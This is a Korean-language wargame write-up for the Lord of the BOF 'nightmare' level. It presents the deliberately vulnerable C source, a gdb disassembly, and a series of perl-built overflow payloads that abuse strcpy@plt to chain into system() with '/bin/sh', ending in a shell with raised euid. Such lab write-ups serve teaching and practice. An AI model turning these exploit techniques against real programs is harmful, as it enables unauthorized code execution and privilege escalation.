방학이 지옥이여 뭐시여 왜나한테 이런 시련을 주는겨 왜 난 학원숙제를 안하고이쓰까나
[succubus@localhost succubus]$ ls
nightmare nightmare.c
[succubus@localhost succubus]$ cat nightmare.c
/*
The Lord of the BOF : The Fellowship of the BOF
- nightmare
- PLT
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dumpcode.h>
/* Intentionally vulnerable wargame target (Lord of the BOF, "nightmare").
 * Implicit-int main with no return statement, kept as in the original listing.
 * Takes one argument, argv[1], with no length limit; the exploit below relies on
 * the exact stack layout shown in the disassembly (buffer at ebp-0x28). */
main(int argc, char *argv[])
{
char buffer[40]; /* at ebp-0x28 in this build (see lea 0xffffffd8(%ebp) in main+106) */
char *addr;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// check address
/* This non-PIE binary calls strcpy through the PLT, so &strcpy evaluates to the
 * PLT stub: main+35 stores the constant 0x8048410 into addr. This is NOT the
 * libc address 0x400767b0 that gdb's `p strcpy` prints. */
addr = (char *)&strcpy;
/* argv[1][44..47] must equal that PLT address. With buffer at ebp-0x28, those
 * four bytes land on main's saved return address once the strcpy() below copies
 * argv[1] into buffer, so main is forced to "return" into strcpy@plt. */
if(memcmp(argv[1]+44, &addr, 4) != 0){
printf("You must fall in love with strcpy()\n");
exit(0);
}// the word right after buffer + saved ebp must be &strcpy; per the "PLT" hint this is the PLT entry, not the libc address
// overflow!
strcpy(buffer, argv[1]); /* unbounded copy: anything past 40 bytes overwrites saved ebp, the return address and the words above it */
printf("%s\n", buffer); /* echoes the whole copied string, i.e. also the bytes past the end of buffer */
// dangerous waterfall
/* Writes 'AAAA' over buffer+48 = ebp+8 (main+142: lea 0x30(%eax)). After
 * `leave; ret` into strcpy@plt, esp is ebp+8, so this word is strcpy's own
 * return address and a ret2libc chain placed there is destroyed. The writeup
 * below bypasses this by handing strcpy a dst argument of ebp+8, so the copy
 * itself rewrites that slot with [&system][ret][&"/bin/sh"] taken from the
 * front of buffer. */
memset(buffer+40+8, 'A', 4);
}
[succubus@localhost succubus]$ cp nightmare fightmare
[succubus@localhost succubus]$ gdb -q fightmare
(gdb) b main
Breakpoint 1 at 0x80486ba
(gdb) r
Starting program: /home/succubus/fightmare
Breakpoint 1, 0x80486ba in main ()
(gdb) p strcpy
$1 = {char *(char *, char *)} 0x400767b0 <strcpy>
(gdb) disas main
Dump of assembler code for function main:
0x80486b4 <main>: push %ebp
0x80486b5 <main+1>: mov %esp,%ebp
0x80486b7 <main+3>: sub $0x2c,%esp
0x80486ba <main+6>: cmpl $0x1,0x8(%ebp)
0x80486be <main+10>: jg 0x80486d7 <main+35>
0x80486c0 <main+12>: push $0x80487db
0x80486c5 <main+17>: call 0x80483e0 <printf>
0x80486ca <main+22>: add $0x4,%esp
0x80486cd <main+25>: push $0x0
0x80486cf <main+27>: call 0x80483f0 <exit>
0x80486d4 <main+32>: add $0x4,%esp
0x80486d7 <main+35>: movl $0x8048410,0xffffffd4(%ebp)
0x80486de <main+42>: push $0x4
0x80486e0 <main+44>: lea 0xffffffd4(%ebp),%eax
0x80486e3 <main+47>: push %eax
0x80486e4 <main+48>: mov 0xc(%ebp),%eax
0x80486e7 <main+51>: add $0x4,%eax
0x80486ea <main+54>: mov (%eax),%edx
0x80486ec <main+56>: add $0x2c,%edx
0x80486ef <main+59>: push %edx
0x80486f0 <main+60>: call 0x80483c0 <memcmp>
0x80486f5 <main+65>: add $0xc,%esp
0x80486f8 <main+68>: mov %eax,%eax
0x80486fa <main+70>: test %eax,%eax
0x80486fc <main+72>: je 0x8048715 <main+97>
0x80486fe <main+74>: push $0x8048800
0x8048703 <main+79>: call 0x80483e0 <printf>
0x8048708 <main+84>: add $0x4,%esp
0x804870b <main+87>: push $0x0
0x804870d <main+89>: call 0x80483f0 <exit>
0x8048712 <main+94>: add $0x4,%esp
0x8048715 <main+97>: mov 0xc(%ebp),%eax
0x8048718 <main+100>: add $0x4,%eax
0x804871b <main+103>: mov (%eax),%edx
0x804871d <main+105>: push %edx
0x804871e <main+106>: lea 0xffffffd8(%ebp),%eax
---Type <return> to continue, or q <return> to quit---
0x8048721 <main+109>: push %eax
0x8048722 <main+110>: call 0x8048410 <strcpy> // @plt 표기는 없지만 0x8048410이 strcpy의 PLT 엔트리. main+35에서 addr에 저장하는 상수도 같은 0x8048410이므로, memcmp가 요구하는 값은 위에서 p strcpy가 보여준 libc 주소 0x400767b0이 아니라 이 PLT 주소임
0x8048727 <main+115>: add $0x8,%esp
0x804872a <main+118>: lea 0xffffffd8(%ebp),%eax
0x804872d <main+121>: push %eax
0x804872e <main+122>: push $0x8048825
0x8048733 <main+127>: call 0x80483e0 <printf>
0x8048738 <main+132>: add $0x8,%esp
0x804873b <main+135>: push $0x4
0x804873d <main+137>: push $0x41
0x804873f <main+139>: lea 0xffffffd8(%ebp),%eax
0x8048742 <main+142>: lea 0x30(%eax),%edx
0x8048745 <main+145>: push %edx
0x8048746 <main+146>: call 0x8048400 <memset>
0x804874b <main+151>: add $0xc,%esp
0x804874e <main+154>: leave
0x804874f <main+155>: ret
End of assembler dump.
(gdb) q
The program is running. Exit anyway? (y or n) y
[succubus@localhost succubus]$ ./fightmare `perl -e 'print "\x90"x44, "\x10\x84\x04\x08"'`
//시도해보니 됨 (memcmp 통과: "You must fall in love with strcpy()"가 안 뜨고 strcpy까지 실행됨). 바로 아래의 Segmentation fault는 main의 ret이 0x8048410(strcpy@plt)으로 간 뒤, strcpy가 ebp+8 자리에 memset이 채워 둔 'AAAA'(0x41414141)로 리턴하기 때문. 올ㅋ
/*여기서 고민을 했는데, 이 프로그램은 strcpy 실행 후 ret 주소가 들어갈 자리를 memset으로 'A'로 채워버립니다. 정확히는 buffer+48 = ebp+8, 즉 main이 leave; ret으로 strcpy@plt에 들어간 뒤 strcpy가 리턴할 주소 자리입니다(그 위 ebp+12, ebp+16이 strcpy의 dst, src 인자). 근데 왜 하필 strcpy일까요? 쓰라고 그런 거겠죠. 인자 길이 제한도 없으니 결국 strcpy 자체를 이용해 그 ret 자리에 주소를 넣는 거라고 생각하게 됐습니다. 즉 dst 인자를 ebp+8로, src 인자를 [system 주소][리턴 주소][\"/bin/sh\" 주소]가 들어 있는 버퍼 안 위치로 주면 strcpy가 memset이 써 둔 'AAAA'를 자기 리턴 주소로 덮어쓰고 system으로 리턴합니다. 처음엔 strcpy 인자 두 개 뒤에 system 주소와 /bin/sh 주소를 넣으려고 했는데 안 됐고, 그래서 그냥 버퍼 앞쪽에 넣었습니다(아래 최종 페이로드: 버퍼 시작이 src, ebp+8이 dst).*/
Segmentation fault (core dumped)
[succubus@localhost succubus]$ gdb -q fightmare
(gdb) b main
Breakpoint 1 at 0x80486ba
(gdb) r
Starting program: /home/succubus/fightmare
Breakpoint 1, 0x80486ba in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>
(gdb) q
The program is running. Exit anyway? (y or n) y
/*중간에 뭔 뻘짓을 너무많이해놔서 안가리고 걍 다 지웠습니다....*/
[succubus@localhost succubus]$export BINSH=`perl -e 'print "/bin/sh"'`
bash2: export: command not found
[succubus@localhost succubus]$ export BINSH=`perl -e 'print "/bin/sh"'`
[succubus@localhost succubus]$ ls
core fightmare nightmare nightmare.c
[succubus@localhost succubus]$ vi foo.c
[succubus@localhost succubus]$ gcc foo.c -o foo
foo.c: In function `main':
foo.c:5: warning: assignment makes pointer from integer without a cast
[succubus@localhost succubus]$ ./foo BINSH
0xbffffc7c
[succubus@localhost succubus]$ ./fightmare `perl -e 'print "\x90"x44, "\x10\x84\x04\x08", "AAAA", "\xd0\xfa\xff\xbf", "\xdc\xfa\xff\xbf", "\xe0\x8a\x05\x40", "BBBB", "\x7c\xfc\xff\xbf" '`
AAAAúú ¿úú ¿@BBBB|ü ¿
Segmentation fault (core dumped)
[succubus@localhost succubus]$ gdb -q -c core
Core was generated by `./fightmare AAAAúú ¿úú ¿@BBB'.
Program terminated with signal 11, Segmentation fault.
#0 0x41414141 in ?? ()
(gdb) x/40wx $esp-80
0xbffffa74: 0xbffffb04 0xbffffab8 0x0804874b 0xbffffac0
0xbffffa84: 0x00000041 0x00000004 0x08048410 0x90909090
0xbffffa94: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffaa4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffab4: 0x90909090 0x4000ae60 0x90909090 0x41414141
0xbffffac4: 0xbffffad0 0xbffffadc 0x40058ae0 0x08048441
0xbffffad4: 0x080486b4 0x00000002 0x08048441 0x080486b4
0xbffffae4: 0x00000002 0xbffffb04 0x08048350 0x0804877c
0xbffffaf4: 0x4000ae60 0xbffffafc 0x40013e90 0x00000002
0xbffffb04: 0xbffffc02 0xbffffc0e 0x00000000 0xbffffc57
(gdb) x/wx 0xbffffa90
0xbffffa90: 0x90909090
(gdb) q
[succubus@localhost succubus]$ ./fightmare `perl -e 'print "\xe0\x8a\x05\x40", "BBBB", "\x7c\xfc\xff\xbf", "\x90"x32, "\x10\x84\x04\x08", "AAAA", "\xd0\xfa\xff\xbf", "\x98\xfa\xff\xbf"'`
@BBBB|ü ¿AAAAúú ¿ú ¿
Segmentation fault (core dumped)
[succubus@localhost succubus]$ gdb -q -c core
Core was generated by `./fightmare @BBBB|ü ¿AAAAúú ¿ú ¿'.
Program terminated with signal 11, Segmentation fault.
#0 0x41410004 in ?? () //잘 안바뀜
(gdb) q
[succubus@localhost succubus]$ ./fightmare `perl -e 'print "\xe0\x8a\x05\x40", "BBBB", "\x7c\xfc\xff\xbf", "\x90"x32, "\x10\x84\x04\x08", "AAAA", "\xd0\xfa\xff\xbf", "\xac\xfa\xff\xbf"'`
@BBBB|ü ¿AAAAúú ¿¬ú ¿
Segmentation fault (core dumped)
[succubus@localhost succubus]$ gdb -q -c core
Core was generated by `./fightmare @BBBB|ü ¿AAAAúú ¿¬ú ¿'.
Program terminated with signal 11, Segmentation fault.
#0 0x90909090 in ?? ()
(gdb) x/40wx 0xbffffaac
0xbffffaac: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffabc: 0x90909090 0x90909090 0x90909090 0x4000ae60
0xbffffacc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffadc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffaec: 0x0800ae60 0x080486b4 0x00000002 0xbffffb14
0xbffffafc: 0x08048350 0x0804877c 0x4000ae60 0xbffffb0c
0xbffffb0c: 0x40013e90 0x00000002 0xbffffc0e 0xbffffc1a
0xbffffb1c: 0x00000000 0xbffffc57 0xbffffc6a 0xbffffc78
0xbffffb2c: 0xbffffc90 0xbffffcaf 0xbffffcd1 0xbffffcdf
0xbffffb3c: 0xbffffea2 0xbffffec1 0xbffffedf 0xbffffef4
(gdb) x/40wx 0xbffffaa8
0xbffffaa8: 0xbffffc7c 0x90909090 0x90909090 0x90909090
0xbffffab8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffac8: 0x4000ae60 0x90909090 0x90909090 0x90909090
0xbffffad8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffae8: 0x90909090 0x0800ae60 0x080486b4 0x00000002
0xbffffaf8: 0xbffffb14 0x08048350 0x0804877c 0x4000ae60
0xbffffb08: 0xbffffb0c 0x40013e90 0x00000002 0xbffffc0e
0xbffffb18: 0xbffffc1a 0x00000000 0xbffffc57 0xbffffc6a
0xbffffb28: 0xbffffc78 0xbffffc90 0xbffffcaf 0xbffffcd1
0xbffffb38: 0xbffffcdf 0xbffffea2 0xbffffec1 0xbffffedf
(gdb) x/40wx 0xbffffaa0
0xbffffaa0: 0x40058ae0 0x42424242 0xbffffc7c 0x90909090
0xbffffab0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffac0: 0x90909090 0x90909090 0x4000ae60 0x90909090
0xbffffad0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffae0: 0x90909090 0x90909090 0x90909090 0x0800ae60
0xbffffaf0: 0x080486b4 0x00000002 0xbffffb14 0x08048350
0xbffffb00: 0x0804877c 0x4000ae60 0xbffffb0c 0x40013e90
0xbffffb10: 0x00000002 0xbffffc0e 0xbffffc1a 0x00000000
0xbffffb20: 0xbffffc57 0xbffffc6a 0xbffffc78 0xbffffc90
0xbffffb30: 0xbffffcaf 0xbffffcd1 0xbffffcdf 0xbffffea2
(gdb) q
[succubus@localhost succubus]$ ./fightmare `perl -e 'print "\xe0\x8a\x05\x40", "BBBB", "\x7c\xfc\xff\xbf", "\x90"x32, "\x10\x84\x04\x08", "AAAA", "\xd0\xfa\xff\xbf", "\xa0\xfa\xff\xbf"'`
@BBBB|ü ¿AAAAúú ¿ ú ¿
Segmentation fault (core dumped)
[succubus@localhost succubus]$ gdb -q -c core
Core was generated by `./fightmare @BBBB|ü ¿AAAAúú ¿ ú ¿'.
Program terminated with signal 11, Segmentation fault.
#0 0x42424242 in ?? ()/*뭐가 잘 안됨. 근데 eip가 BBBB(0x42424242)라는 건 strcpy가 ebp+8을 [system][BBBB][인자 주소]로 덮어 system()까지는 실행됐고, system이 리턴 주소 BBBB로 돌아왔다는 뜻. 체인 자체는 맞고 system에 넘긴 문자열 주소가 틀린 것 — 바로 아래 x/s로 확인*/
(gdb) q
[succubus@localhost succubus]$ gdb -q -c core
Core was generated by `./fightmare @BBBB|ü ¿AAAAúú ¿ ú ¿'.
Program terminated with signal 11, Segmentation fault.
#0 0x42424242 in ?? ()
(gdb) x/s 0xbffffc7c
0xbffffc7c: "TEHOST=192.168.10.1" /*foo.c너는 대체 나에게 무슨 주소를 준것이냐.. → ./foo가 출력한 BINSH 주소는 ./foo 프로세스 기준. 환경 문자열 위치는 프로그램 이름(argv[0])과 인자 길이 등에 따라 밀리기 때문에 ./fightmare에서는 12바이트 아래인 0xbffffc70에 있음(아래 x/5s 0xbffffc70 참고). 이런 주소는 대상 바이너리의 코어에서 직접 확인하는 게 안전함*/
(gdb) x/5s 0xbffffc7c
0xbffffc7c: "TEHOST=192.168.10.1"
0xbffffc90: "HOSTNAME=localhost.localdomain"
0xbffffcaf: "LESSOPEN=|/usr/bin/lesspipe.sh %s"
0xbffffcd1: "USER=succubus"
0xbffffcdf: "LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01"...
(gdb) x/5s 0xbffffc70
0xbffffc70: "/bin/sh"
0xbffffc78: "REMOTEHOST=192.168.10.1"
0xbffffc90: "HOSTNAME=localhost.localdomain"
0xbffffcaf: "LESSOPEN=|/usr/bin/lesspipe.sh %s"
0xbffffcd1: "USER=succubus"
(gdb) q
[succubus@localhost succubus]$ ./fightmare `perl -e 'print "\xe0\x8a\x05\x40", "BBBB", "\x70\xfc\xff\xbf", "\x90"x32, "\x10\x84\x04\x08", "AAAA", "\xd0\xfa\xff\xbf", "\xa0\xfa\xff\xbf"'`
@BBBBpü ¿AAAAúú ¿ ú ¿
bash$ exit
exit
Segmentation fault (core dumped)
[succubus@localhost succubus]$ ./nightmare `perl -e 'print "\xe0\x8a\x05\x40", "BBBB", "\x70\xfc\xff\xbf", "\x90"x32, "\x10\x84\x04\x08", "AAAA", "\xd0\xfa\xff\xbf", "\xa0\xfa\xff\xbf"'`
@BBBBpü ¿AAAAúú ¿ ú ¿
bash$ my-pass
euid = 518
굿굿